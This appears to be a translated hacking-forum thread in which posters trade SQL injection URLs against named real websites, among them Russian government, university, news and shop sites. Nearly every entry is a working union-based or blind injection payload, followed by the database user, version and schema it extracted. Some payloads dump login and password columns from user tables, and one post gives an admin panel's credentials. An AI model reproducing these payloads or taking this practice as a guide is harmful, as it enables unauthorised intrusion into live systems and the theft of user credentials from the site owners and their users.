insanely-great.com PR-5 Code: www.insanely-great.com/news.php?id=-11189+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+ Code: 5.0.77-log:[email protected]:flamini_igm innovid.com PR-5 Code: http://www.innovid.com/news.php?itemID=52+and+5=substring((SELECT+version()),1,1)+--+ library.uni-altai.ru ТИЦ-180 Code: library.uni-altai.ru/FullNews/shownew.php?num=-1253+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11+--+ Code: 5.1.49-3-log:serg@localhost:libnews
Code: http://www.nov-mvd.ru/GUVDpoNSO/Statistika?blogs2_id=552+limit+0+union+select+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6 Web Server: Apache/2.0.63-lk.d (Unix) mod_ssl/2.0.63-lk.d OpenSSL/0.9.8g mod_dp20/0.99.2 mod_python/3.3.1 Python/2.5.1 mod_ruby/1.2.6 Ruby/1.8.6(2007-09-24) DB Server: MySQL Current DB: notixshoru_mvd
Code: http://www.zebra.nsk.ru/index.php?page=lotinfo&id=-9277+union+select+1,2,concat_ws(0x3a3a3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+ zebransk_base@localhost:::5.1.50-rel11.4-log:::zebra777_base
тиЦ 800 PR 5 vns@localhost:5.1.53-log:www тиЦ 160 PR 4 printmag@localhost:wwwprintmagazinr:4.1.25-log тиЦ 30 PR 3 200148610@localhost:4.1.25-log:db00148610 тиЦ 30 PR 3 [email protected]:5.0.90-log:u25499
I don't know where to post admin panels, so I posted it here! Code: http://www.konkir.ru/ Mods, if I just can't see it, sorry, move it to where it should be! root:market2004
Dedicated to those indifferent to the Russian auto industry... www.la[g]da.ru PR/TYC = 6/1700 DB: Oracle Databases Code: http://www.la[g]da.ru/carco[g]lors.php?ba[g]se_id=6295171 AND ASCII(SUBSTR((SELECT NVL(CAST(COUNT(DISTINCT(OWNER)) AS VARC[g]HAR(4000)),CHR(32)) FROM SYS.ALL_TABLES),1,1)) > 51 Tables Code: http://www.la[g]da.ru/ca[g]rcolors.php?ba[g]se_id=6295171 AND ASCII(SUBS[g]TR((SELECT NVL(CAST(TABLE_NAME AS VARCHAR(4000)),CHR(32)) FRO[g]M (SELECT TABLE_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE OWNER=CHR(68)||CHR(83)||CHR(79)) WHERE LIMIT=4),6,1)) = 68 Columns Code: http://www.la[g]da.ru/carco[g]lors.php?ba[g]se_id=6295171 AND ASCII(SUBSTR((SEL[g]ECT NVL(CAST(COUNT(COLUMN_NAME) AS VARCHAR(4000)),CHR(32)) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=CHR(68)||CHR(90)||CHR(79)||CHR(95)||CHR(85)||CHR(83)||CHR(69)||CHR(82)),1,1)) > 48 PHP: databases [9]: CTXSYS DSO <-- default DSO1 DSOTMP EXFSYS MDSYS OUTLN SYS SYSTEM
willkommen-tv.at PR-5 Code: http://www.willkommen-tv.at/artikel.php?id=8+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9+--+ Code: 4.0.27inode:[email protected]:wi000142_0001 netporn.nl alexa-34k Code: http://www.netporn.nl/uprofile.php?UID=70796+and+5=substring((SELECT+version()),1,1) surfbirds.com PR-5 Code: http://surfbirds.com/video2/uprofile.php?UID=1045+UnIon+selECt+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+--+ Code: 5.0.83-rs-log:surfbirds_vshare@localhost:surfbirds_videoshare
Sorry for the slight off-topic, BUT... Dear sir, on what assumptions do you claim that the above-quoted table is there, if the hoster cuts all your queries? A shot in the dark?? When the hoster blocks queries, nothing prevents us from using the blind injection method and working with the data obtained. There is no phpbb_users table there, but there is forum_users. I'll say even more: the forum_users table has as many as 10690 records. Judge for yourself PHP: http://www.ma3da.ru/news.php?news_id=999999.9+or+ascii(substring((SELECT+count(*)+FROM+ma3daru.forum_users),1,1))=49 http://www.ma3da.ru/news.php?news_id=999999.9+or+ascii(substring((SELECT+count(*)+FROM+ma3daru.forum_users),2,1))=48 http://www.ma3da.ru/news.php?news_id=99999+or+ascii(substring((SELECT+count(*)+FROM+ma3daru.forum_users),3,1))=54 http://www.ma3da.ru/news.php?news_id=99999+or+ascii(substring((SELECT+count(*)+FROM+ma3daru.forum_users),4,1))=57 http://www.ma3da.ru/news.php?news_id=99999+or+ascii(substring((SELECT+count(*)+FROM+ma3daru.forum_users),5,1))=48
тиЦ 650 PR 5 Code: http://zvezda.ru/news_read.php?id=-9999999/**/union/**/select/**/concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,2,3,4,5,6,7,8,9+--+ antares_user@localhost:antares_DB:5.0.92-community Code: http://zvezda.ru/news_read.php?id=-9999999/**/union/**/select/**/group_concat%28table_name%29,2,3,4,5,6,7,8,9/**/from/**/information_schema.tables+--+
тиЦ 80 PR 6 Code: http://sundaytimes.lk/financenews/articleXYZ100000010.php?id=-1+union+select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,2,3,4,5,6,7,8--+ suntimes_sunday@localhost:suntimes_suntimes:5.0.92-community Code: http://sundaytimes.lk/financenews/articleXYZ100000010.php?id=-1+union+select+group_concat%28table_name%29,2,3,4,5,6,7,8+from+information_schema.tables-- тиЦ 10 PR 5 Code: http://www.financierworldwide.com/gp.php?id=99999999+union+select+1,2,3,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,5,6,7--+ financierworld@localhost:financierworld:4.1.20-community-nt
Just a hoster https://www.host.co.in/hostbill/shoppingcart.php?gid=-5%27+union+select+1,2,3,user%28%29,version%28%29,6,7,8,9,database%28%29,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,61,62,63,64,65,66--+
тиЦ 10 PR 3 Code: http://www.allpartners.ru/shops.php?id=99999999+union+select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,2,3,4,5,6,7--+ ronis@localhost:wwwpultlggru:5.1.25-rc-log Code: http://www.allpartners.ru/shops.php?id=99999999+union+select+group_concat%28table_name%29,2,3,4,5,6,7+from+information_schema.tables-- тиЦ 10 PR 6 Code: http://www.pierce.ctc.[COLOR=Red][B]edu[/B][/COLOR]/pubs/thepen/print.php?id=99999999+union+select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,2,3--+ newsletter@localhost:newsletter:5.1.36-community Code: http://www.pierce.ctc.edu/pubs/thepen/print.php?id=-99999999+union+select+group_concat%28table_name%29,2,3+from+information_schema.tables--
Pick whatever interests you Code: http://www.handspc.ru/soft/soft.php?id=183/**/union/**/select/**/1,version%28%29,3,4,5,6,7%20,8,9,10,11,12,13,14,table_name,16,17,18,19,20,21,22,23,24,25,26,27/**/from/**/information_schema.tables/**/--/**/ USERS Code: http://www.handspc.ru/soft/soft.php?id=183/**/union/**/select/**/1,version%28%29,3,user%28%29,5,6,7,8,9,10,11,12,13,14,concat_ws%280x3a,id,login,password%29,16,17,18,19,20,21,22,23,24,25,26,27/**/from/**/auth_tld/**/--/**/ Here's one more, but this one takes some thinking, and I'm too lazy Code: http://job.saleone.ru/findrezum.php?a=2&id_rezum=705+order+by+18 And one more, everything as it should be. Code: http://efamily.ru/index.phtml?aid=-733+union+select+1,user%28%29,version%28%29,4,concat_ws%280x3a,ID,user_login,user_pass,user_email%29,6,7,8,9,9+from+wp_users+--+&id=101&page=40003 and another Code: http://www.europa.fm/ru/index.html?c=about&id=-1+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables+limit%200,1-- (A night without shells... shameful...)
OxoTnik, IMHO you shouldn't be working on RU =/ But that's your business... So, Geodata = Google Maps, American style PHP: http://geodata.us/uk_maps/map.php?id=999999'+union+select+null,null,user(),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+and+'a'='a Code: Current User: relgr_geodata@localhost Sql Version: 5.0.77 Current DB: relgr_geodata Data Bases: information_schema relgr_geodata
Lazy =) Code: Current User: mt_jobpages@localhost Sql Version: 5.0.90-log Current DB: mt_jobpages Blind SQL here.